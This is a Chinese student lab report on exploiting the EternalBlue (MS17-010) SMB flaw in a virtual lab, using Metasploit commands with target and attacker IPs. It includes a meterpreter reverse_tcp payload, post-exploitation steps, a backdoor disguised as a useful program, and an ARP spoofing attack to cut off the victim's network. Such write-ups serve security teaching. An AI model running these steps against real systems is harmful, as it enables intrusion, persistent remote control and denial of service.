导语

最近学期末进行网络安全实训，老师要求每个小组选择一个方向进行研究，本篇将讲述“永恒之蓝”漏洞的简单利用。

一、实验原理

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，电脑只要开机，攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

三、实验记录

一次渗透的基本步骤

（1）启动kali虚机，进入root权限打开Metasploit渗透工具。
msfconsole

（2）打开另一个窗口，扫描一下靶机是否开启了445端口以及查看版本信息
nmap -sV -p 445 192.168.79.129（靶机地址）。

（3）search：搜索msf中相关组件
利用模块进行漏洞验证、。
search ms17-010

（4）使用use auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞。

（5）然后查看具体需要配置的东西
show options

（6）设置攻击目标及端口
set rhosts 192.168.79.129
set rport 445
配置完后使用run命令开始测试

host likely vulnerable to MS17-010
表示主机存在这个漏洞，可以利用攻击。
host does not appear vulnerable
主机不易受到攻击 / 不存在这个漏洞。

注：实验一开始靶机选取的是OWASP，经过验证后发现不存在MS17-010漏洞，故更换为win7虚拟机。

补充：
（1）渗透攻击（Exploit）,指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞，所进行的攻击行为。

（2）攻击载荷（Payload），是我们期望目标系统在被渗透攻击之后去执行的代码。

（3）模块（Module），指Metasploit框架中所使用的一段软件代码组件，可用于发起渗透攻击或执行某些辅助攻击动作。

四、实验步骤

（1）关闭防火墙，ping通两台主机使其能访问外网。

在一台宿主主机上安装两个不同的虚拟机镜像构建一个虚拟的网络，其中，一台虚拟机为win7,一台虚拟机为Kali Linux。

• 打开VMware，“编辑”——“虚拟网络映射器”——“桥接模式”
  
• 将两台虚拟机的IP地址分配方式为自动获取（也就是动态IP）。

win7：“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改适配器设置”——>选择网卡然后右击“属性”——>选择“TCP/IPV4”——>“属性”，选择“自动获得IP地址”——>点击“确定”即可。


**Kali Linux：**打开/etc/network/interfaces文件，配置interfaces文件
gedit /etc/network/interfaces

#The primary network interface
auto eth0
iface eth0 inet dhcp

• Kali Linux通过ifconfig查看IP地址（注意不是ip），测试连通性。
  
  
  

（2）代码植入控制靶机
msfconsole打开metasploit工具
search ms17_010查找漏洞
use exploit/windows/smb/ms17_010_eternalblue使用"永恒之蓝"攻击代码植入漏洞
set RHOST 192.168.47.132设置靶机
set LHOST 192.168.47.131设置攻击机
set payload windows/x64/meterpreter/reverse_tcp设置有效载荷
show options显示选项设置
用run进行攻击


到这就算成了(*￣rǒ￣)。

五、实现小操作

（1）输入sysinfo查看系统信息。
（2）screenshot截取靶机正在浏览的页面，并保存到攻击机。

（3）输入shell进入win7控制台，与在win7中具有同样效果。


（4）上传一个文件1.jpg给靶机


（5）生成后门程序，然后将后门伪装成一个有用的程序上传到受害者系统，在攻击端利用use exploit/multi/handler监听消息 ，对方点开程序后我们会收到消息，就可以知道装入成功了。



有了后门以后，不用再输入对方IP，即使对方改了IP地址也可以进入。

（6）查看操作系统补丁情况

（7）ARP断网攻击，给他把网断老。

-i 指定网卡

-t 指定目标ip

这里的192.168.47.2是网关

ARP断网攻击，欺骗对方无法上网，ctrl+c停止欺骗

（8）在win7上新建一个用户


（9）没了

原理

“永恒之蓝”漏洞工具利用了c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度，导致复制数据时出现内存溢出。
溢出的数据覆盖了用于接收数据的内存区域指针，把合法地址修改成了系统保留区域（KI_USER_SHARED_DATA0xf fdf0000）的地址，导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回（SystemCallReturn）地址，从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中，使攻击者成功执行shellcode获得超级用户权限。

总结

老师一直不在，自己查资料坐牢一样,尤其是OWASP虚拟机搞半天没那个漏洞，差点换课题，总算混完了，还两门考试没复习呢摸了摸了。。(*￣rǒ￣)